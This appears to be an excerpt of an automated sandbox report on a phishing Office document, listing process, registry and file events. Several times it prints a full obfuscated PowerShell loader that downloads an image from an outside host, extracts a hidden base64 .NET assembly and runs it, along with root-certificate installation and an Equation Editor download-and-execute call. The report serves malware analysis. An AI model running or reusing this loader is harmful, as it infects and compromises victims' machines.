    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: ~DF669CF6B4D81DE92B.TMP.0.drInitial sample: OLE indicators vbamacros = False
    Source: Ship particulars.xlsInitial sample: OLE indicators encrypted = True

    Data Obfuscation

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00214C5C push cs; ret 12_2_00214C62

    Persistence and Installation Behavior

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\hop.fyi\DavWWWRootJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\hop.fyi\DavWWWRootJump to behavior
    Source: Office documentLLM: Score: 8 Reasons: The screenshot contains a visually prominent button labeled 'Enable Editing' which is highlighted in yellow. The text in the screenshot creates a sense of urgency by stating 'contenido bloqueado, habilite la edicin para ver el documento' and 'Content Locked. Please enable Editing and Content from the Yellow bar above to view locked content.' This type of message is commonly used in phishing attempts to trick users into enabling macros or other potentially harmful features. There is no clear impersonation of well-known brands, but the format and language used are typical of phishing attempts. The sense of urgency is directly connected to the prominent button, increasing the risk of the user being misled into enabling potentially harmful content.
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: uh.uh.uhuhuh.uu.uh[1].doc.0.drJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 4924813.doc.3.drJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035B05A1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
